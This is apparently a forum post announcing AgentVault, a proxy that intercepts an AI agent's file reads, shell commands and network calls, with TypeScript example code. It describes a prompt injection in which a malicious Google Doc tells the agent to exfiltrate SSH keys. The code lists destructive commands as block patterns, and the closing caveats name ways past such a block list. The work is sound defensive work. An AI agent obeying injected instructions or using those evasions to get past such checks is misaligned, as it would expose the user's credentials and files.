After watching OpenClaw hit 179K GitHub stars while accumulating 5 CVEs, 341 malicious marketplace skills, and 42K exposed instances in 10 days, I spent 3 hours building AgentVault.
The Issue
Research from Penligent, Zenity, and CrowdStrike reached the same conclusion: prompt injection is architecturally unsolvable. You cannot prevent a bad prompt from reaching the model. What you can do is stop the malicious actions that follow.
What AgentVault Offers
- Deep file system interception – catches the moment an agent reads ~/.aws/credentials.
- Dangerous command blocking – stops ‘rm -rf’ and similar destructive commands.
- Human-in-the-loop approvals – every risky action requires your OK.
- Network monitoring – logs every outbound connection.
- SQLite audit log – a complete trail of everything the agent attempted.
The approach is to let the prompt injection succeed and instead catch what it tries to do. When a malicious Google Doc tells the agent to exfiltrate your SSH keys, AgentVault blocks the file read and notifies you.
Built with Node.js/TypeScript, a Next.js dashboard, and a SQLite audit log. It wraps OpenClaw's execution layer with a proxy that intercepts system calls.
This is day one. What would it take to make this useful for your setup?
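To make the "let the injection land, gate the action" idea concrete, here is an added illustration in TypeScript of what such an action gate looks like. It is not AgentVault's code (the names ToolCall, evaluate, ActionGate and demo are this example's own), and it intercepts at the level of the agent's tool calls inside Node rather than at real system calls. It covers the four behaviours in the list above: sensitive-path reads are blocked after ~ and ../ are resolved, recursive-force rm and pipe-to-shell commands are blocked, privileged or publishing commands go to an approval callback, outbound HTTP is recorded but not blocked, and every decision lands in an in-memory audit log standing in for the SQLite table. The sample calls in demo() are constructed for the example.

```typescript
// Illustrative AgentVault-style action gate (example code, not the project's own).
import * as path from "node:path";
import * as os from "node:os";

export type Verdict = "allow" | "block" | "approve";
export type ToolCall =
  | { tool: "read_file"; path: string }
  | { tool: "shell"; command: string }
  | { tool: "http"; url: string };
export interface Decision { verdict: Verdict; reason: string }
export interface AuditEntry { ts: string; call: ToolCall; decision: Decision; executed: boolean }

// Paths under $HOME an agent has no business reading (assumed list).
const SENSITIVE = [".aws", ".ssh", ".gnupg", ".kube/config", ".netrc", ".docker/config.json", ".env"];

// Expand ~ and collapse ../ so "~/proj/../.ssh/id_ed25519" is seen for what it is.
function normalize(p: string, home: string): string {
  const expanded = p === "~" || p.startsWith("~/") ? path.join(home, p.slice(1)) : p;
  return path.resolve(home, expanded); // relative paths resolve against home
}

function isSensitivePath(p: string, home: string): boolean {
  const target = normalize(p, home);
  return SENSITIVE.some((s) => {
    const guarded = path.join(home, s);
    return target === guarded || target.startsWith(guarded + path.sep);
  });
}

// Split on ; && || | and newlines so "ls; rm -rf ~" cannot hide behind a harmless prefix.
function segments(cmd: string): string[][] {
  return cmd.split(/\s*(?:;|&&|\|\||\||\n)\s*/).map((s) => s.trim().split(/\s+/).filter(Boolean));
}

// True for rm with both recursive and force flags, in any order or spelling (-rf, -fr, -r -f, --recursive --force).
function isRecursiveForceRm(argv: string[]): boolean {
  if (argv[0] !== "rm") return false;
  const flags = argv.slice(1).filter((a) => a.startsWith("-"));
  const long = new Set(flags);
  const short = flags.filter((f) => !f.startsWith("--")).join("");
  const recursive = long.has("--recursive") || /[rR]/.test(short);
  const force = long.has("--force") || short.includes("f");
  return recursive && force;
}

const BLOCK_PATTERNS: RegExp[] = [
  /\bmkfs(\.\w+)?\b/,
  /\bdd\b.*\bof=\/dev\//,
  /\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b/, // pipe-to-shell
  /:\(\)\s*\{/,                                    // fork bomb
  />\s*\/dev\/sd/,
];
// Not destructive by themselves, but worth a human's OK before they run.
const APPROVE_PATTERNS: RegExp[] = [/\bsudo\b/, /\bgit\s+push\b/, /\bchmod\b/, /\bssh\b/, /\bscp\b/, /\bnpm\s+publish\b/];

export function evaluate(call: ToolCall, home: string = os.homedir()): Decision {
  switch (call.tool) {
    case "read_file":
      return isSensitivePath(call.path, home)
        ? { verdict: "block", reason: `read of sensitive path ${normalize(call.path, home)}` }
        : { verdict: "allow", reason: "path not in sensitive set" };
    case "shell": {
      if (segments(call.command).some(isRecursiveForceRm)) return { verdict: "block", reason: "recursive force rm" };
      const hit = BLOCK_PATTERNS.find((re) => re.test(call.command));
      if (hit) return { verdict: "block", reason: `matched ${hit}` };
      const risky = APPROVE_PATTERNS.find((re) => re.test(call.command));
      if (risky) return { verdict: "approve", reason: `matched ${risky}` };
      return { verdict: "allow", reason: "no dangerous pattern" };
    }
    case "http":
      // Outbound traffic is recorded, not blocked, matching the post's description.
      return { verdict: "allow", reason: `outbound to ${new URL(call.url).hostname}` };
  }
}

export class ActionGate {
  private log: AuditEntry[] = [];
  constructor(
    private readonly approve: (call: ToolCall, reason: string) => boolean, // human-in-the-loop hook
    private readonly home: string = os.homedir(),
  ) {}

  // Wrap the real executor; every call passes through policy and is logged before it runs.
  guard<T>(execute: (call: ToolCall) => T): (call: ToolCall) => T | undefined {
    return (call) => {
      const decision = evaluate(call, this.home);
      const executed =
        decision.verdict === "allow" || (decision.verdict === "approve" && this.approve(call, decision.reason));
      this.log.push({ ts: new Date().toISOString(), call, decision, executed });
      return executed ? execute(call) : undefined;
    };
  }

  audit(): readonly AuditEntry[] { return this.log; }
}

// Constructed sample: the calls an injected "send me your SSH keys" instruction might produce.
export function demo(home = "/home/dev"): readonly AuditEntry[] {
  const gate = new ActionGate(() => false, home); // approver that denies everything
  const run = gate.guard((call) => `ran ${call.tool}`);
  const calls: ToolCall[] = [
    { tool: "read_file", path: "~/project/README.md" },
    { tool: "read_file", path: "~/project/../.ssh/id_ed25519" },
    { tool: "shell", command: "ls -la && rm -rf ~/project" },
    { tool: "shell", command: "git push origin main" },
    { tool: "http", url: "https://attacker.example/collect" },
  ];
  calls.forEach(run);
  return gate.audit();
}
```

Two caveats a practitioner would raise against this shape of gate. Path matching here does not resolve symlinks (fs.realpathSync needs the file to exist), so a link from inside the project into ~/.ssh would slip past; resolve the real path before comparing in a production version. And pattern-based command blocking is a speed bump, not a boundary: `find ~ -delete`, `python -c`, or a base64-wrapped payload never match `rm -rf`, which is why the approval hook and the audit trail matter more than the block list.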
hugoventures1•2h ago
Live demo / GitHub: https://github.com/hugoventures1-glitch/agentvault